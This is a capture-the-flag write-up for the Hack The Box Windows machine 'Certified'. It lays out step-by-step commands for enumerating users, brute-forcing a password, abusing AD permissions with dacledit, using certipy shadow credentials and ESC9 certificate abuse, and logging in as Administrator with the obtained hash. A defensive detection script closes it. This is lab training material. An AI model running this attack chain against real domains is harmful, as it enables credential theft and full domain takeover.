HTB_Certified
Windows (Medium)
sudo nmap -sS -p- --min-rate 10000 -Pn 10.10.11.41
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
9389/tcp open adws
cat 1 | grep tcp | awk -F '/' '{printf $1","}'
sudo nmap -p53,88,135,139,389,445,464,593,636,3268,3269,9389,49666,49668,49669,49670,49677,49705,49727,55039 -sCV -Pn 10.10.11.41
A quick look: no web port, hmm, but there is a domain.
Ports 139 and 445 first: let's look at the SMB service.
enum4linux -a 10.10.11.41 # null-session login is possible
smbclient --no-pass -L //10.10.11.41 # no result
Looks like there is no way around enumeration.
What about port 88? Enumerate possible usernames.
./kerbrute_linux_amd64 userenum --dc certified.htb -d certified.htb /usr/share/seclists/usernames_10m.txt
Honestly, it ran for quite a while; in the end it came back with judith.mader. Next, brute-force the password.
sudo crackmapexec smb 10.10.11.41 --users -u judith.mader -p /usr/share/wordlists/rockyou.txt
Got judith09.
This one was handed to me directly by someone in the channel; as I see it, this is how it should have been obtained.
Now enumerate and look at the files.
smbclient -U 'judith.mader%judith09' -L //10.10.11.41
But it failed (Error NT_STATUS_IO_TIMEOUT).
Sometimes the response is instead:
Error NT_STATUS_RESOURCE_NAME_NOT_FOUND
Unable to connect with SMB1 -- no workgroup available
But crackmapexec clearly says this credential works.
sudo crackmapexec smb 10.10.11.41 --users -u judith.mader -p judith09 --shares # confirm the shares are read-only
sudo crackmapexec smb 10.10.11.41 --users -u judith.mader -p judith09 --rid-brute # enumerate the other accounts
Found a few additional users, such as gregory, harry and management_svc.
Now that we have a credential, try WinRM: nothing (obviously, there is no such service).
Try LDAP.
ldapdomaindump 10.10.11.41 -u 'certified.htb\judith.mader' -p 'judith09'
Look at domain_users.html; no password information there.
So for the manage* user, does the password also have to be brute-forced? Let crackmapexec run on it for now; no result.
To solve the smbclient login problem I found this: https://forum.hackthebox.com/t/starting-box-nt-status-resource-name-not-found/2757/8
It turns out that dropping the -L option works.
smbclient -N //10.10.11.41/C$
Anonymous login successful
tree connect failed: NT_STATUS_ACCESS_DENIED
smbclient -U 'judith.mader%judith09' //10.10.11.41/SYSVOL # nothing useful found
ADMIN$ and C$ are denied; IPC$ and NETLOGON have nothing in them.
So what else can judith's credential do?
Remote BloodHound
python ~/htb/tools/Blood*/bloodhound.py -d certified.htb -u judith.mader -p judith09 -gc certified.htb -c all -ns 10.10.11.41
zip -ur 1.zip ./*.json
Start neo4j console -> analyze in BloodHound
https://xz.aliyun.com/t/14499
This counts as a complete chain: judith has WriteOwner on the Management group, the Management group has GenericWrite on the domain member management_svc, and svc has CanPSRemote to DC01.
Can we get a shell as judith first?
https://xz.aliyun.com/t/11877 impacket usage
impacket-psexec certified.htb/judith.mader:[email protected]
But none of the shared folders are writable.
So what else can this credential do? Search for what the corresponding rights allow.
https://book.hacktricks.xyz/cn/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation#abuse
Found a certipy command for enumerating and abusing AD certificates.
certipy-ad find -vulnerable -u [email protected] -p judith09 -dc-ip 10.10.11.41
But the resulting json file says [!] Could not find any certificate templates; no vulnerability, which means the command below cannot be used.
certipy-ad req -username [email protected] -password judith09 -target-ip 10.10.11.41 -ca 'certified-DC01-CA' -template 'ESC1' -upn '[email protected]'
The commands below do not work either.
xfreerdp /u:JUDITH.MADER /p:"judith09" /v:10.10.11.41
rpcclient -U "judith.mader%judith09" 10.10.11.41
#Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
???? Wait, what?
https://www.thehacker.recipes/ad/movement/dacl/
DACLs (Active Directory Discretionary Access Control Lists) are lists made of ACEs (Access Control Entries) that identify the users and groups that are allowed or denied access on an object. SACLs (Systems Access Control Lists) define the audit and monitoring rules over a securable object.
Since we have WriteOwner, we indirectly have WriteDacl as well.
https://book.hacktricks.xyz/cn/windows-hardening/active-directory-methodology/acl-persistence-abuse
https://github.com/fortra/impacket/blob/master/examples/dacledit.py
It can be downloaded directly, but I only copied two files over.
┌──(kali㉿xinGuang)-[/usr/lib/python3/dist-packages/impacket]
└─$ sudo cp ~/htb/tools/msada_guids.py msada_guids.py
https://exploit-notes.hdks.org/exploit/windows/active-directory/dacl-attack/
python ~/htb/tools/dacledit.py -action read -target management -principal judith.mader -dc-ip 10.10.11.41 certified.htb/judith.mader:judith09
python ~/htb/tools/dacledit.py -action write -rights 'FullControl' -principal judith.mader -target management -inheritance -dc-ip 10.10.11.41 certified.htb/judith.mader:judith09 -use-ldaps
[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
The system clock needs to be synchronized.
https://worktile.com/kb/ask/342992.html
sudo apt-get install ntpdate
sudo ntpdate 10.10.11.41
Run the dacledit command above again.
#[*] DACL modified successfully!
# i.e. the permission was changed to FullControl; check again
python ~/htb/tools/dacledit.py -action read -target management -principal judith.mader -dc-ip 10.10.11.41 certified.htb/judith.mader:judith09
But running the commands above the next day no longer worked; all of them errored with INSUFF_ACCESS_RIGHTS.
In any case, I had to reset the machine before it worked again.
python ~/htb/tools/dacledit.py certified.htb/judith.mader:judith09 -action write -rights FullControl -principal judith.mader -target management -inheritance -use-ldaps -k -dc-ip 10.10.11.41
https://xz.aliyun.com/t/12462 describes a technique called targetedKerberoast; searching for it, a similar command is as follows. It only requires that the account has an SPN configured plus the credential of any ordinary domain user.
impacket-GetUserSPNs certified.htb/judith.mader:judith09 -request-user management_svc
Obtained svc's hashes.asreproast.
https://www.cnblogs.com/nice0e3/p/15784113.html
Copy the whole thing out and try cracking it.
hashcat64.exe -m 13100 --force -a 0 test.txt rockyou.txt
OK, it couldn't be cracked, but at least we got the SPN: certified.htb/management_svc.DC01
RBCD attempt (not feasible)
This part is purely a record of the process and can be skipped; the steps that actually work are in the ADCS section.
So this route doesn't work.
Later I found that judith can use rpcclient after all; failing to log in earlier was probably due to a wrong command...
rpcclient -U "judith.mader%judith09" 10.10.11.41
So how can this be used? It can only view domain information and the like.
>enumdomgroups # group:[Management] rid:[0x450]
>querydispinfo #judith RID: 0x44f , svc RID: 0x451
> queryusergroups 0x451 #450 201
> queryusergroups 0x44f #201
This mainly confirmed further that judith has to be added to the Management group before anything can be done to svc.
https://www.samba.org/samba/docs/old/Samba3-HOWTO/NetCommand.html
https://www.thehacker.recipes/ad/movement/dacl/addmember
net rpc group addmem management judith.mader -U certified.htb/judith.mader%judith09 -S 10.10.11.41
https://www.freebuf.com/articles/network/385993.html
https://abrictosecurity.com/pentesting-active-directory-certificate-services-adcs-esc1-esc8/
net rpc password "management_svc" -U "certified.htb/judith.mader%judith09" -S "10.10.11.41" # not enough rights to change the password; GenericAll is required
After some more searching: with GenericWrite, RBCD can be used.
https://exploit-notes.hdks.org/exploit/windows/active-directory/resource-based-constrained-delegation-attack/
So the whole command looks like this:
python ~/htb/tools/dacledit.py certified.htb/judith.mader:judith09 -action write -rights FullControl -principal judith.mader -target management -inheritance -use-ldaps -k -dc-ip 10.10.11.41; net rpc group addmem management judith.mader -U certified.htb/judith.mader%judith09 -S 10.10.11.41; impacket-addcomputer -computer-name 'FAKECOMPUTER1$' -computer-pass 'password123' -dc-ip 10.10.11.41 certified.htb/judith.mader:judith09; impacket-rbcd -delegate-from 'FAKECOMPUTER1$' -delegate-to 'management_svc' -dc-ip 10.10.11.41 -action 'write' 'certified.htb/judith.mader:judith09'; impacket-getST -spn 'certified.htb/management_svc.DC01' -impersonate management_svc -dc-ip 10.10.11.41 'certified.htb/FAKECOMPUTER1$:password123'
export KRB5CCNAME=`pwd`/[email protected][email protected]
klist
impacket-wmiexec certified.htb/[email protected] -k -no-pass
impacket-psexec -k -no-pass certified.htb/[email protected]
impacket-secretsdump certified.htb/[email protected] -k -no-pass
OK, confirmed at last: this step doesn't work either.
ADCS exploitation
Back to the start: the step of adding judith to the Management group is definitely fine.
https://book.hacktricks.xyz/cn/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation#abuse-with-certipy the ESC9 section of this article, certipy-ad shadow
sudo ntpdate 10.10.11.41;python ~/htb/tools/dacledit.py certified.htb/judith.mader:judith09 -action write -rights FullControl -principal judith.mader -target management -inheritance -use-ldaps -dc-ip 10.10.11.41;net rpc group addmem management judith.mader -U certified.htb/judith.mader%judith09 -S 10.10.11.41;certipy-ad shadow auto -username [email protected] -password judith09 -account management_svc
This yields svc's hash.
evil-winrm can't log in and psexec doesn't work either; never mind, we can now switch to the management_svc user. Continue following the ESC9 steps; because some commands stop working after a while, do it all in one go.
python ~/htb/tools/dacledit.py certified.htb/judith.mader:judith09 -action write -rights FullControl -principal judith.mader -target management -inheritance -use-ldaps -dc-ip 10.10.11.41;net rpc group addmem management judith.mader -U certified.htb/judith.mader%judith09 -S 10.10.11.41;certipy-ad shadow auto -username [email protected] -password judith09 -account management_svc;certipy-ad account update -username [email protected] -password judith09 -user management_svc -upn Administrator;certipy-ad req -username [email protected] -hashes a091?584 -ca certified-DC01-CA -template ESC9;certipy-ad account update -username [email protected] -password judith09 -user management_svc -upn [email protected];certipy-ad auth -pfx adminitrator.pfx -domain certified.htb
But it stopped at the second-to-last step: [-] Failed to request certificate
(In fact, running certipy-ad find as svc shows no templates.)
So this is probably not the way. Back to the BloodHound page: svc has a relationship with CA_OPERATOR. Looking further, this holds: management_svc has GenericAll on ca_operator.
Look at ca_operator's hash.
certipy-ad shadow auto -username [email protected] -hashes a091c1832bcdd4677c28b5a6a1295584 -account ca_operator
Look at the certificate templates; OK, only ca_operator can be used this way.
certipy-ad find -vulnerable -u [email protected] -hashes a.. -dc-ip 10.10.11.41 # nothing
certipy-ad find -vulnerable -u [email protected] -hashes b4b86????2 -dc-ip 10.10.11.41 # this one has something: ESC9
So just follow ESC9:
certipy-ad account update -u [email protected] -hashes a091???4 -user ca_operator -upn Administrator;certipy-ad req -u [email protected] -hashes b4b86f45???2 -ca certified-DC01-CA -template ESC9;certipy-ad account update -username [email protected] -hashes a091c1???5584 -user ca_operator -upn [email protected];certipy-ad auth -pfx administrator.pfx -domain certified.htb
Hmm, failed.
In the end, J hinted that the template name could be changed.
certipy-ad req -u [email protected] -hashes b4b86???8f2 -ca certified-DC01-CA -template CertifiedAuthentication;
This is strange: when the previous command has -upn Administrator, it errors with
The NETBIOS connection with the remote host timed out.
Restarted the target machine a few times
and tried it separately
certipy-ad req -u [email protected] -hashes b4b8???f2 -ca certified-DC01-CA -template CertifiedAuthentication
At this point the saved pfx is ca_operator's.
Running the following again, it suddenly worked.
certipy-ad account update -u [email protected] -hashes a091????5584 -user ca_operator -upn Administrator;certipy-ad req -u [email protected] -hashes b4b?8???d8f2 -ca certified-DC01-CA -template CertifiedAuthentication;certipy-ad account update -username [email protected] -hashes a091c???584 -user ca_operator -upn [email protected];certipy-ad auth -pfx administrator.pfx -domain certified.htb
Finally, Administrator's hash.
Finally, just log in, using the SMB service on ports 139 and 445.
impacket-psexec certified.htb/[email protected] -hashes aaaa:0???2d34
Summary
Studying AD always teaches something new.
user.txt:
1. Port 88: enumerate usernames, then brute-force the password with crackmapexec
2. Analyze the relationships between members with BloodHound
3. Add the judith user to the Management group (WriteOwner) -> gain GenericWrite over the svc user
4. certipy shadow to obtain svc's hash
root.txt:
1. certipy find gives nothing -> BloodHound further reveals that svc has GenericAll on ca_operator
2. Obtain ca_operator's hash -> use ADCS (ESC9) to get the Administrator hash
3. Use the SMB service to log in
Use the initial credential with BloodHound analysis and make full use of the rights between members.
Mainly the use of the dacledit and certipy tools, plus the various reference articles had it all written down already (but what I don't know, I just don't know).
With GenericWrite, the object's hash can be obtained via certificates (certipy).
1. Why does setting FullControl with dacledit sometimes fail? How can the judith member have no rights over the Management group?
A: Reset the target machine a few more times.
2. The principles behind the approach above are fairly complex to me, so I won't analyze them blindly here.
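As an added defender-side example that is not part of the original write-up: detection logic that flags each step of the chain summarized above (self-add to a group, shadow credential written, UPN swapped to a privileged name, certificate issued while the UPN is swapped) over constructed, simplified Windows Security events. The event IDs are real; the field names are trimmed stand-ins for the real event schemas, and the sample events are constructed to mirror this box.

```python
# Added example (not from the write-up): flag the steps of the chain above in
# Windows Security events. Event IDs are real (4728 member added to a global
# group, 5136 directory object modified, 4887 CA issued a certificate); field
# names are simplified stand-ins and the sample events below are constructed.
PRIVILEGED_NAMES = {"administrator"}

SAMPLE_EVENTS = [  # constructed, mirrors the write-up's chain
    {"id": 4728, "subject": "judith.mader", "member": "judith.mader", "group": "Management"},
    {"id": 5136, "subject": "judith.mader", "object": "management_svc",
     "attribute": "msDS-KeyCredentialLink", "value": "B:828:<placeholder>"},
    {"id": 5136, "subject": "management_svc", "object": "ca_operator",
     "attribute": "msDS-KeyCredentialLink", "value": "B:828:<placeholder>"},
    {"id": 5136, "subject": "management_svc", "object": "ca_operator",
     "attribute": "userPrincipalName", "value": "Administrator"},
    {"id": 4887, "requester": "ca_operator", "template": "CertifiedAuthentication"},
    {"id": 5136, "subject": "management_svc", "object": "ca_operator",
     "attribute": "userPrincipalName", "value": "ca_operator@certified.htb"},
]


def analyze(events):
    """Return (rule, detail) findings in event order.

    self-add     a subject adds its own account to a group (WriteOwner/WriteDacl abuse)
    shadow-cred  msDS-KeyCredentialLink written on another account (certipy shadow)
    upn-hijack   userPrincipalName of one account set to a privileged name (ESC9 step 1)
    esc9-cert    a certificate issued to an account while its UPN is hijacked
    """
    findings = []
    hijacked = set()  # accounts whose UPN currently points at a privileged name
    for e in events:
        if e["id"] == 4728 and e["subject"].lower() == e["member"].lower():
            findings.append(("self-add", f"{e['subject']} added itself to {e['group']}"))
        elif e["id"] == 5136 and e["attribute"] == "msDS-KeyCredentialLink":
            findings.append(("shadow-cred", f"{e['subject']} wrote key credential on {e['object']}"))
        elif e["id"] == 5136 and e["attribute"] == "userPrincipalName":
            target = e["object"].lower()
            new_upn = e["value"].split("@")[0].lower()
            if new_upn in PRIVILEGED_NAMES and new_upn != target:
                hijacked.add(target)
                findings.append(("upn-hijack", f"{e['object']} UPN set to {e['value']} by {e['subject']}"))
            else:
                hijacked.discard(target)  # UPN restored: the window for the cert request closes
        elif e["id"] == 4887 and e["requester"].lower() in hijacked:
            findings.append(("esc9-cert", f"{e['requester']} got a {e['template']} cert while hijacked"))
    return findings
```

The quick UPN swap-and-restore in the write-up is exactly the window the last rule keys on, so correlating 5136 and 4887 by order matters more than either event alone.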
References
wp: clues left by the masters' discussion + J's hint
DACL: https://book.hacktricks.xyz/cn/windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces
dacledit script: https://github.com/fortra/impacket/blob/master/examples/dacledit.py
certipy usage: https://book.hacktricks.xyz/cn/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation#abuse-with-certipy
ADCS exploitation: https://book.hacktricks.xyz/cn/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation#abuse-with-certipy
BloodHound script for collecting domain member information:
https://github.com/dirkjanm/BloodHound.py
BloodHound UI analysis:
https://xz.aliyun.com/t/14499
https://www.freebuf.com/articles/web/288370.html
sudo apt-get install bloodhound
sudo neo4j console
Visit http://localhost:7474/browser/; the default credential is neo4j:neo4j
neo4j123
The server side is now up; open a new window and run bloodhound
zip -ur 1.zip ./*.json
Upload the zip archive.
Also, if neo4j did not exit cleanly, starting it again may report that Neo4j is already running; use sudo neo4j stop
Stopping also times out, so just reboot the machine.
SPN exploitation principle https://xz.aliyun.com/t/12998
Remote group addition:
https://www.samba.org/samba/docs/old/Samba3-HOWTO/NetCommand.html
https://www.thehacker.recipes/ad/movement/dacl/addmember
Synchronize system time https://worktile.com/kb/ask/342992.html
sudo apt-get install ntpdate
sudo ntpdate 10.10.11.41
Originally published on the WeChat public account 羽泪云小栈: HTB_Certified